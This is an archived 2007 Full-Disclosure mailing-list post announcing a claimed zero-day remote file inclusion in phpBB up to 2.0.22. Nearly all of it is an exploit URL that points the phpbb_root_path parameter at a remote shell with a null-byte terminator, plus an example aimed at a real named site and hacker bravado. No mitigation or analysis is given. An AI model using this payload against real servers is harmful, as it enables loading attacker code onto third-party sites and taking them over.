|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
dr.rezen
gmail.com
Date: Fri Jun 01 2007 - 12:05:01 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:
victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
For example:
http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
Enjoy :)
BUG BY REZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]